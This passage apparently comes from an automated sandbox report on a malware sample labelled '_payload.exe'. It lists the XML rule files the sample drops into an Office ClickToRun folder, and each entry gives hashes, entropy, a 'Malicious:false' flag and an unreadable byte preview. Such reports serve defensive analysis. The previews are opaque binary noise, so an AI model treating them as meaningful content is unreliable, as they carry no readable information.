                                                                                                                                                                      Preview:<?xml..Ay.?..Ds...MA;.pk.;.),.....o.....}...F.y.v..C...G+......T..]a..<..o.Zs.t.....r.d].Bo.e.A....3P^....%Mw}TO*~..B9..q....J..N..3...."=f<..J/=*.x....q....*..#.W.s3..+...}....)..G...>{...:1. .R.`@a...V..x........g.q......}...m.q.P. ..D7..m.C..*...-.V..a76D.".u.....?2.....w.H..E..E.&HR[...7...M..3+..2...../k..b7.T%.33....DY...O...d.z...Y.1>h#..:>.=u......{K.8....4.....w.....%,..<.6d..x...\...l.i@@].UUA.....6..5.+...M....mZ.....2}..[..v.D9h/Z....3..&.`.+?.[...w...'E..T.I. y2.s./B.O.# .k6.@[6g.X....k....Rv`.K...e....t......:...UY..~...Z...S.......\.....Y....s.d...L.z......> .l.I..+e..../..K...'Fx..T.@.*.. T.(,=/..M....7..U..U$p..g........<..,oK...aF.....r.....V.K...%%./lTW....b.zr........~.AT.%....y<6...)|.gs..k.Qs.M...Z.....oz....9E\...?.U.mQ....S....k.M...:....4.F&.).......sb.y..;.......F.v....P....q.*#..l...1..p...c^....TU..2.t....`....cy.F7...2...L.hC.........D..h.....4.....4...kP.P....L;.]H.B..J.....~.2...H.9..h.........m...]

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702201v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                      Entropy (8bit):7.876620644250412
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:XjKHoiE0jP98edsN9aAbu3/h7OGEMD1a+fND:zKIp0T9pyN9LS371Vf1
                                                                                                                                                                      MD5:10A3D753C933BAF987F14322CB0A1387
                                                                                                                                                                      SHA1:8833E3A8FA21F2879B6D2FD545894B3D7E9840A3
                                                                                                                                                                      SHA-256:383FABD9EB60F8C0A37D0DF4CB1A0E4A30D55A58763A8CEC04547BAD78057F32
                                                                                                                                                                      SHA-512:C76F8220F31860E85E7368443A2DFA4F45286C621F45B7E8886FF3D7C9C48050DBA078D38AE8DE2A0EC9E89BDDD9BF04FA46DFBA58C648F8C2676831DE3A5CE5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.....;c.p..?..i....S.<Y./.2...t..[_....].g..R......jU!.Z\;.?......ik..i..6I....H..O..m:.Ge,.M#.......f.=.Fs\&6c...YZ....Z.{_..sB.E....J![l...Q..8.7.i.O.z.P.........W):.Q..fPk..u.Y.~`....A.....:1.^..A.]+.t...4R.k=4.h.*...k......H.8Uv.\x.Z'B4#...=$.?.H2.oZ.v...4B.X..E.o...K..@F.{!Hke..q.S.`I........]...4....;.[ ......Q-...>l."&....+.yEEQY9y.i.{.r.F.......u).4(N.}.,..r....\'.a...DY.z1.%.N...].}....C.-...v6..w.}...|V....(QZ...\&.N.L.....!9..../....[..?.*^: .w..N.g....e6.Y...Qo...Z.\...3...w.l8xw.5..!...'..4."......HOJX....}...W..r..}.....d..\.....<......\....9.WA..w.`.ZNX.J..!T.sq2._...h..7.b...X...FH.o......w8..F#....1,.Q.u.5c."...G.^,.`..g.)..*s...9..<.....[..B.Q...mG..W'j...W'.C..@p......F......9.P.....Z.......r.M_..dc^W"..m....h-i/.NG....G.8.+..R.t.y.j.k..K.7....]...x.9..I@.y...99e.+.GA.1..."......`z.bf.KU0KA...es.d_...R..s(3H..E.7.t+S`..I=..1.j5..>...|....}...T........O....._......2-Ui..*.!.kVP.k..cJ.T..:x.ny`:OCx>!K...}...VV..'....h...YV^

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702250v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1686
                                                                                                                                                                      Entropy (8bit):7.879603249725635
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ZgYl/Pi171dwnSgGydLW2gHb21w4lBR1uD:ZlnY1dMGmLWHbrmR1W
                                                                                                                                                                      MD5:0DEFC1F00F692711E0D8DC61B5CD1371
                                                                                                                                                                      SHA1:249D0026691A44211DEFA751455E1B5E7F0D055A
                                                                                                                                                                      SHA-256:A53E7FEE8B9C8E679D87BD23E7D9ECC7281EC2F6F733285E53A619C56325B4D7
                                                                                                                                                                      SHA-512:F4C78AF6B81B200B491CA49068629D06B2ABF7AAF2CDA9798108F24988D8F39EB64ED12985C438DC1118DFE905388864978D5E71EAE89584F4E0130DB43FAF77
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?r....A=".A)..q.~-.s...| .U,.U....X...P..$^....L .P..D.;.H...g9kr.d.<...yF].Y..h.nE[au..>Iv.....4.....[5..#.*.)..hm?......v.O..w.d.=A>.?4.Pl..........L)gS.i....I)...=)......F.ohw..3.u...3.&!.B.r_@&.D&.q..#.5.......Jh._z^<.A?..A..?.............=@.......=........;C+I. .[...L&.?.n........g....U|A...q..J....:t..q".....+....h..E(.....`.....j...t.56......&L..#k./@......$e;..U<..5...........3`..{.F]!X|.&/I.....z8V.......Fw.:T..$.3.z..7..b\k.q$..JR.g.....$.):`.@. V..)tu*..uA1V..q.3w49....Z&!..8.RS.......4.I..W.X.5D.....l...q.j_..G....@].D...M}.M...u...#0w.~...}Z.......p..u..uj.|.;6...bh...t}3....`'..VZ.:...M....q.Wp.td>....c].....c.x.Zk.......w...|}9..7.Wd./..I6C...L.Z./.../t..&....3z.q.3(P..yhS.g.%t[.V..v..{...{.8...owx{.E.e..W$.........c..X..*.......L....O.=...h..xc'g.'@+.:"i.....&2G..Z...K@H...s..>.....fI.~.*+.....jD2...y.v..%.&. .../..#6hK).*.Oc..vx....o..U]...x.B1;z..mA.(....o.s+..H.c.Yd=..*[G...(u..-.J....P4'|.O........{..`.u..i...sb.w...~1..9..U_...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702251v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1723
                                                                                                                                                                      Entropy (8bit):7.8815370024417115
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fJMeZFYuvppusKxUsqybnNTH9Ayg1acIR1nD:f66FYuvm3/jDNTGfpIR1D
                                                                                                                                                                      MD5:E645BA398FC5C19E66DC2B45DB1FE813
                                                                                                                                                                      SHA1:EA22DEBE4B980309F0FD8CCE87E921D74A36684F
                                                                                                                                                                      SHA-256:CE9DB3099E8253D1DAC72E65E67CA84DC90030E61A299A2BEB560CA51D32EA2F
                                                                                                                                                                      SHA-512:CC470D3692A5FBB1EC41A0C502A71414CD0FCF7D4E8E51BB80247133777D5D063F37F1AF5FE95380BCE6C6588F86F0E281F6DB4E7C8B23FDAC321E2B0F5D9E1C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.b.........F..-......../..'..X\Y..@...WM.'.r.(.7>wP..X..Q.Z.&+\....|m...*..0^...a.C..L....h....[.7@....0..t..<8.-#........K.%.rq..\.....n./...R....O..Z..p... ...*6.}..u......x-....H\..,...X.;..{...s...3..9..>...z....D.I.j..K6X...b...^W.s..+ec4<>..x..[=/..^...t..avi.>t.......I.gL.%..|.a=.>9.p...X..F...G`..(.paG..;._........#.^...p..ba}.[Cu..n..-..qq.t.s.....fo...(..`...Qq...IM..g.3..Q.B.@.aTN$...M....37p+Q.).o....<....{!R.{..w....j..X.....o.....;..e. ...y.^..W..yI.u..OCu,[.L.o.d-.uX.r.i9+.G.^..G....N...]#.hf..'.n./....A...Lg.P...K...!..mXac..'...*..).......L..m..).f..Yb.....1.}.YZ......A.#..3.1.S."%....r....|.Q.\.r.*l=......~.9.|M..Iy5)....B.p..I2....CK.f...B.D7."..^0..+>8#.f...Dd..}M....,.<o5..q4.....v.0#..B?.....3..O....JX+_O....N.L..P..!z1...*T..._.....P...[.9V-& r3.w..o....>.4.gRE[i..e..'d...].........W...b}V.'....5`z.......m.F.j....q..]P.KW.?.G.?K...Y?.@K..6...l..6.....a.,$>.t^V...~nE.........Or.n4..~..~.yd.JIw..bkM..9."rN.6.".^.9

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702300v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.880525012367274
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FXwRc5EJpt6EJ0Qdzy4GlsAvOxsMHQIK24NFyD:mRcCZ0QdbZHun24NY
                                                                                                                                                                      MD5:4C380F148CFC6ADFC2BA384425FA235B
                                                                                                                                                                      SHA1:0EDC22E0008E66BB061FB6D7FA7FB8A90202FD3D
                                                                                                                                                                      SHA-256:8E17229796329E05DC514C50D08F1C6353253629530501F5F05DCA9CC7E002D4
                                                                                                                                                                      SHA-512:2E80CB67AD4EF8A4F46B7B5053FAEBD8DBD6DD69B7F0521A4B8A95DE81ABE74FFC3148D0A7ABBB427808A6E7405881A829DC8E2CFD479C99769811338FE6904B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?2.W.8..!..c*l....k|t..v4n.`.e....aj.SV.]Q..M.H.z.f'...i..+..DM.xv......g...9..j.............d...D..8..$q.....r..I....Xs.C.uJ......T.!w.p..@...7. ....R..=7.xa._..\.....%...W.M..b........e....!...:"...r.C...DM..q..._.U.?..&...><...6......[i.....#n.....`..J.5h1.F..z..T.;8.....M...D..d.J.+'..M,KR.LM..`....1y.?W....>./m{..8..I.O..e.|.!^.P.E....w...Ce...3..{..!.o.)g..T.F.O7j.:5..mGU.m]...RxX.j...00.Dm\P...x\u..b.q..T.R.O.H.w...E...pJ.x|,..t.).78.vd...A.z.v....*.......%.#.5%.'..V..(...."...Mu<....E.e.0;...l.34.B\..tg...^..1..-.}.O=..08+H............C..s\9t'r....U..H....=...W.m..-....$..b.Y..'.kr.X)..x..E.....)@.9..U......5..q.....^.m..l..:.n.........^. .;...C.;.Q.)T4G..shd..^.H....2..U..F......"..z.....Y...*.....*...z`..X.6....../0..........7..Cu....C...n..8-..V..y..t.@8..B....F?%2xJ..wy.O....-....{..I..[Y.)W...m<Yu.5 ...{......rnI..oQ..=V.....H9....N...Io..^_H...bX.}@.lc..5..N.....).TZ..Q..).zD.mG..R...(%U..`.....`W........r.0E:.e...x5

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702301v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.878633989852041
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:B5qufXcX9RGiIZKb3Wtr+5v2giaQ7C9YGIx7W1LElVvVwWiT+5eao2bD:ffXY9RG/K6QWaQ7Z7W1IlQX8jbD
                                                                                                                                                                      MD5:B726ED92CAAD3B295029CAA421BFD8FC
                                                                                                                                                                      SHA1:EFD31B18AE19054CCF82FA12D90E6EFA9CE0D89C
                                                                                                                                                                      SHA-256:FD1E4BFEEA14D2BE4351A94A18C463F3963D1491D9FEBFAF420EAAB389D9CA96
                                                                                                                                                                      SHA-512:95CC159EFDE578777B4D69C66C39D2E8D1E148E8477B90C65132A9912DCC3026220C9E45F52EE6B4774C75F104349D9BBBCB4E81013337AA3CEE63C1E62C4382
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.!T2...d/.(.W..m...{=..^s..@a.O.RKN..s..+D.[.}...4n^O=.....(..5....[+h"pB."0.`.l..;..fl3.5.E.p.B.@..N..6f......9.E+..k<.hQ1...?u.v.....yI.0FG?AJ.T.\"\9$....&..I....WjT.a.....Q.'...:.;"i#.b..h.8..;..._...Z0:.Z...0..."....e.(...ugM......B..V...,....Z!..rH.sThJy.7^_PM..A..q...Y<y..zbd....z..8....0.4.h.bR....N....!..v.6..M#......Z..q...F.^..Ka....fZ...3.._9At[\..u@xw_..h.......l...z....F..Kpw.z....n.#:z..y)Y.t...^h.A3A.or...../.l.-).J...]L.......r.N.|[C&.....i....^ymG.D..s[*q............Z.....\......Bq.I.Cw..Q?.........a-.....BTv....,{..W...+;......7...[....Y..B...~a.o..-.>..'1w...YmF....$..>....Kl0...p.8O....:g....m.......N..oIS..f.......w..I:.....",.L..I."..L..o...t.SW...>.....M..q.r.._|Y...$.RI0..t...X...h..y\..=...J.;_V....4...U?-.)BD.B.;...x$b.YA....U..y.._ujpv..$D....A(.Z..\..Y..v...n%h.m&....O...h?.|`jyS.ch.....-[....kZ.#.f*O..N...BS0J...;....h.M(..#.8.xY....e.R..&J).@x.5(&m........H"..\9.PM_.5 .....~...........H.a9..=....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702350v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1692
                                                                                                                                                                      Entropy (8bit):7.88981837015653
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:TK/gVvmP4SFG2cNmdTh1CUHW9IzMjGe6ddcphOALtzbD:TQ6mzM2imdKU2DG/0nOAJX
                                                                                                                                                                      MD5:0EE2D14BCDE7354CF157CB285C145748
                                                                                                                                                                      SHA1:0038202B57445F671277F980BAA80FF5B8E7819B
                                                                                                                                                                      SHA-256:68C460F7870D0B2E058752C08E53ED8F0CB8F955B3D4C2B0CE32CCE35C75629D
                                                                                                                                                                      SHA-512:0858E1564D4CCEA1C597585B30DF4C4E880B570423D76939DA867FC15822625DDACC986B1AD42D1AA578BDB2D031221659C4D5253298172227FCD894F4AA5535
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...N..^.X.....]0.9....i..2.0..A...6..d.c....AJ....d...~.....3.....;.YSV.JS.;..2[.G5..q...P.....X~.....U.+b.......K..z.c..A.r....R..'.`.-s......8z/Hg(...............R....4..R..&..J&....>..|...d.+kH$..8..b,m..X.z..Z.S......Ft......v....V.....T..@.....4..$ .nuN#........A..v.W...=...7G....X...v u&....@T)*.....,.....`>...x.g....G.Qd.`G..s...n..M..\@.5.. ....;..&...|.Z.v...z.^e...%4...s.B..w.+..3O.dI.3...,N...K.*....5.......@q....Y.>.N.].l...VnZ..Y.L('#....K.)..H...2..*7.. ...B...V@.....v.f..H....B&......B82^..j..l7....#.....W......?z....3..ti...t.3.)....( .M1.*U..;.d.K..^I....H{\s%m.(W..,...[...!....O....W;.&^|Qk~.z.U.M...qk.Gn.p.....6.B..X..6X........Q-..4..^.........z..-.H}uu2i..g\<......\.&..aA<...n`...... .......6.h.._ NW....e|...z...E..@q.HN...=...(.D......K6+..Sq.e/8.Q.1M...?.^4.#{.#...:.%b.......w...2.%..P.1...o...BQ...9..E$..=u........K....d..R.lW.....d....J..y...Y..2..,%_.jr,.?.>.Jbn.....b.p.........t#...=.-q..e...=.......^....OI.C

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702351v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1729
                                                                                                                                                                      Entropy (8bit):7.882619789587399
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:abBDRLIoyhP2xG6OunXOeg34gog5vMmmXJSe6I91VR7D:abBDRDyhP2xGeeego25s5SZw3
                                                                                                                                                                      MD5:C691E5BDB31BF5BA94D902CC406222EF
                                                                                                                                                                      SHA1:CAC24A817A9BBB2C0BFAE0EBC7B3378BE088696F
                                                                                                                                                                      SHA-256:5F73CDE021F97175F392CFE7169063D18D60235F02FEF3AB97A0845AC65667D5
                                                                                                                                                                      SHA-512:ABE896CB7980B8A697D559E98731F59513DD647268F9741A94E95C2C28E950D3AB68D1E86541DE49A117F6E49BA903E1D56C749AE96A5631A145FDC55962D458
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?Gl>S.O.\...n7..q.....Co.j.ek.....f.^..Hf..K...zhx..H.se.{...o......p.W...E8.y..k...e...&.>.S..w.S.{.'.^^.......JXF..^...........{...........v}......FAowY....k..G$....).y.{&....O&#.G.ZL...]@0.d.....\faw.8..q..$).7)NJ._cs.dG......Z...W._......|...%..{...?C..S.?.ZkP..v6.Z..2...;"...Q..,&.;Ay|..G.M(W........|.......H.....Y...mtH...b..T..`R..w}?..o@;2....b.2.l5.Ry.<..X+.W}..j~.=M..8.....OH.....#...-|...._j..Z. ~.U..X.|g.Z7..rG..j.>.....{}=II../../...U\..I..}R. <.@...a......5cQ.f..i.o!...B....e.@...K.d.~.K2X....Z.....@..+k.>..'.(.Z..kh....KP.%.f..Wf)...bL@.V..;.].G.u.J.....h.'.^._..~..*.W.i.v.c1.....k...5{.=.a........B5..:..QJ,......-.....#..Q;..P.?.h .........I.%m;..L..-..."..i.,.ow.F}.......x...5E8w...Ic.....s5..T.I....u.M...\.k(..sx7.....x..3219.....j..R..*3......!...k...>.?.vZu....H..]/h.Z ..i.......!...bB..c.Ws3XW\.'0.j.<.f..-LM.Y.A..R/....2 C....Ky#|hp.Ur.O}.."....c.......O.,q....d$.'.....^"..L.......f.....;.-.n.K...iG.m/|...*..}.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702400v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1702
                                                                                                                                                                      Entropy (8bit):7.89824636313209
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:f7isXMDb9Hupvj8GssI1yxR8A3l5RYCRkWxUD:fescDBH+LnssIAfRYGdxA
                                                                                                                                                                      MD5:1E2E633FCFDA25AC46059731A96DCC66
                                                                                                                                                                      SHA1:56F108B62001B496C2FD6CA6C3B126A5B02BF930
                                                                                                                                                                      SHA-256:BB4B814C9CACE1899792BD926D444B33C8CB5E4325EFC408E31F10B9263E47CE
                                                                                                                                                                      SHA-512:4C52029FE52D8D032773373A3763601AB45624F5FA124DF67AD096AADF61DA502E0CF396061C5CC6AEC2F9B1164C597169F2E00EFD27492AB9C43AD09545D80A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.".^......E........U...Q...1?7.N.Dg>.a.?.n4...Mr...4U...bv.0..i;.W....s..T.a..wo8C..s%..~..+?8......".......+.......LE...2.N.~...b'..........?>... ..L`Q.D<6>.3..O.I.....%..Lv.A.2..".).B..)......t2......4W...(.................0H }....|....3n..3....e.T..7.=.....;.!.............1.._:G3q.N:.3,..........U.......`K..g.....&.Bj.nh.c......y..L.^.@."k\.+...C.......j...}.k....$..&r.Y.yw..9@...D..L....>{.)h..Jl_.-(...Le......>T.ub...1D.KG..........-qLg...L.M...I..Fil7,S{....C.Y..w ...r........3EY.,4...N.<..R....v.$fe........].../#.3(....uXS.dh.J....;...u..s.....W..T...2 ...\|..T.(/Pm;..8.fv...K.k,+../l..7..=.\.....;....N.4de...^b\.....j.F.)......O.%V.".!........HUf.._..P0q.5e.M;.4..DB.R.......t....L.k..`...%s.&..y..h.Cc-..t...Go.r..*D.zU....-N.Q..R$.c..x..ez...#C.v...h.,...._.M.......|H~[!..1.....>p..7T+w...W..B..J......@.?.#8w.?d...#!........K......s&..[.f..tiMg"..T{z..j..e.^."._a..$..Dk).&.. .]l.u05.Ut.".Z...W.......3.7_F*"..-.(.S....Gy

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702401v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1739
                                                                                                                                                                      Entropy (8bit):7.899414371637089
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5+u0Awgbwcg9wJsFikizCNqAaAkX52mnD:kXikbaR3
                                                                                                                                                                      MD5:D6185C5DAAC460A9D88213F1A50F91CA
                                                                                                                                                                      SHA1:D67E1898E47D348C29965573BC4599913C7A28AD
                                                                                                                                                                      SHA-256:8D504336EE69D50F42E1D63BA215EC8DACB7F419CADB6A3721121EA6F6EDA971
                                                                                                                                                                      SHA-512:65221A9D941C1EEEBFAEA782BF5944D3E07BC4AE36A4EC81BD7D6F25B65499F8E5F2797ACA3B4E5CD74F64F06AA2C5312482B49149248E75FA48ACE62D456B80
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..$.fb.6.-p...!-.....nF4..e..C."a...f....3rV.>.n...5.be.....2F....f....^..5=%..|...=.`..9.E.2.:..4<K..J...s...=.r..l.......a..<...M...f_..^;C*o..>. .@..8@5... ..M..v...:....N7...z..'.*dhY..O..r\.Hu@G=.(.......J..~=O...I.W.a4..3.....U..4.o..Z..619..}..C-.....GMa6......]...a..~.gzZ...7,..74..U.)..r.g.F...&m1..G...o.....Xi..;=..}...-.&..O./.....uC.....!..b...X..J..y.c|..g,Q....1L.,...<..t...e....#.%.V-B.f.2o...v6Gi...:.[8yM..B.s.x.....M.5.o(........#5...la......}..#..U..Ng...'J..H[..........I$.`g..5..u...:..i. .t.Q.XRv....k.Y....`....8&xY.:F...):.q.(..l)R..d..U}.<\...z...E..y.s..n..-.........F.19..D..E.._....._..u....L.X'..>.....[.rh$...$..(..g..N.L......zv.U.G..+....p...a...B"]]....N.....F......,.c...w*!./...S:*>..E.2^...:{f_7N..#;]..p.!,*.'..ct..K...B~}....*d.=.TMB..../.Ne9l..O&.B."W..>...V8..QP.O.zO..}d..j......U_......U(2W..$.EJ..;...../.}Q=_. .OJ.O1....&..~d.....@...!K..:..ypB....W6.....W.C..K.d...l[-.hR......"...:.....&[T.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702450v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1694
                                                                                                                                                                      Entropy (8bit):7.8680120086519745
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:yv3+DnrDxMt2ZgQ3yyfknJ7MfnG8HxKMgyD:ZDnrtd9kneL
                                                                                                                                                                      MD5:0122FBE385AAF5E3199647C73985B2A5
                                                                                                                                                                      SHA1:F1538F837D3C93CFFF339FD345677BC541E4EB21
                                                                                                                                                                      SHA-256:76E92AF18F48FB7C66F7B068C891C768871A9F337FD5BC362E7FDC12FA17296F
                                                                                                                                                                      SHA-512:686D48A1C3AEEAE1DAA41B7E061F71EA7CA1C2B739BFF2DB1049ACC2A768F7F3CF5831C0ACA92A3C35ACCF4ABB35495CF15B11FD29662BD6B8D066BBAFE95231
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..V.$.^.8......&9....&+.?._....6....\..B..+.9..f.21.?..v.[}..N.Q....MWM...s^.?.y^p.]...o.s......a&U61H..NJv....H;z..........Z.#lb5-U-.z..UvC...A.{...o....tgom..$..D..d6....D... ......W.%.E..7..6.......YB.....v.)?f..f...{."......S.v=...d..."b..-j.Hi.p........wf.....s.Z...x...>.d`..._.....$..9R.5_...k...a.r.@Kh..P..*^.N.H.....8.YL.J...k=..mu...O.Dn..@...h._..Bn6.%. d.M..........&b_@..Cj...E...A.w:.D...Td..W.U~..(.NK?.............=...mMd..Ku...".5.8....]O.....xS...Wtt.`.:......."b./.LBG\]..LbhMd.....(..0.....m6./S..m...}Bn...B....`0N...9MQx..i.'t4#cc.p.?......."MT...%Q.......V...Zh....j....F*...&...1..}.%.....S..e..[.....+w....f.oT..@@.W.Xp.}JZ..L%A}1;....Z./:G........C....YA>...#vVF..$.3/..jTiI\.vf.......h.*...K-o.s...p.[4..+......U.I...;v.4.A...-,I..........c.b...d4,.....i.^..@6.'...m......"1....6.B.!..D.\...8{5'.&..}.2..8......9.8.(.i..6....g...vw.mI....)(.c.M........x...A.`H..:7.@..5.,...".sE..s.j.m..$.'...w.A..t.....Ix4.Vt

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702451v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1731
                                                                                                                                                                      Entropy (8bit):7.876708058445149
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:0Jki/IdTAgWEa0uEN/9yZTNwuHn0P/irQAdSCLaiN5nVcw1ZNI4/g2cXRYuB02bD:Ni/IGrbS/90HKacCSCLaWcwLOIcXS2D
                                                                                                                                                                      MD5:4CBD0D31A158423D61BDA908C609E8A1
                                                                                                                                                                      SHA1:B51A2CB2C66771A7621D067B5C2C648E862DEDE1
                                                                                                                                                                      SHA-256:1E6C656FE1E2B15BA9E84C2F471BD2D32AFAFBC3AB601C335DBBA86A3DCC94BD
                                                                                                                                                                      SHA-512:40493613F63F018B4F85338C1D42A5993C01F2B9935D795BB1CFE4E3778C40BAF2F3C01E7E137C1711033110A22A3D2048D09C5E88C5064B485402C4502ACD21
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...hEZ..N[G..WU...8..d6...eX.Z.<L.....$F.(.5.:...~....#....EW{.&l...}...4.n,7+Y.&..n.u'..r..H.....%B9sUI.....I.MK..|.U)..k}K....kX...Ts......kVK..P.Z.."...$....l..gK..Lt.lvO....t............pC'..{3...G G....s...U...oDS.'.Q>..c.;.....R.4.!rl.KXxb...h....L..lq... m.[`?gF.A._'..r..Yqu.../...1...Vt....%..Ei..r.lq..=.cEC....i$.kX...5...-...gO.2......\.1..|....ygm|.k..|.r.T.YJm...D.|....m.l....9.5X.K...:......\..,...sf~.w.B.m<X1..%Qp ......"......U.vJ.>p..O)i*.~.v..........x......`..9[i|nG.bp.?d{.>.....Sj.).g.e.....h.....P!G.................,... ...^.E....5d.......z..4..*L\>tK.|.......!.G....4..4.~...+8.......a@..^{..Lt...t...[......qS5.L....?.D.Kk....B...b.....}2...Wr* 7.E]...k....^.?..b...U.C..7K....mb.\(..To.r...+...'......j6n..T.n.........1#3..B7.F!.."f.Z..,.oX1.........p...[.l.e....An^.u.=M...m.a|.....J..0.K<..u[...,.9.N.uz."v..t......hu...X.n..t...FJD.6.#:.S.L...""|'.......Ry..l.%.2.i...w.3.&.CHL.:ap]..7.$..&........`..-.....G.W.(.Z..D.^..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702500v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1712
                                                                                                                                                                      Entropy (8bit):7.892662658806259
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:5wsx8+Elc04zHwM9ZjyKtPwtXWlx0J6S4i6uD:cj4LxyS4rh6W
                                                                                                                                                                      MD5:BBF74E60F884CA0AD484AADB9C1A3A81
                                                                                                                                                                      SHA1:90CB6EC3E9687830B95B9BEF906F470444DD7C03
                                                                                                                                                                      SHA-256:59E0C55FF3E5B747AED10D6BB97A41A986585EBD65E363796295FD898EB19C02
                                                                                                                                                                      SHA-512:ED702D249E29CCCEA8211A28223CFB1F073418DED9E71EC01E50B7501E3082CCC761E7D05941DF2260D0021AFA825B28834CA9BB2099FBCA61F943FC6CB175AF
                                                                                                                                                                      Malicious:false
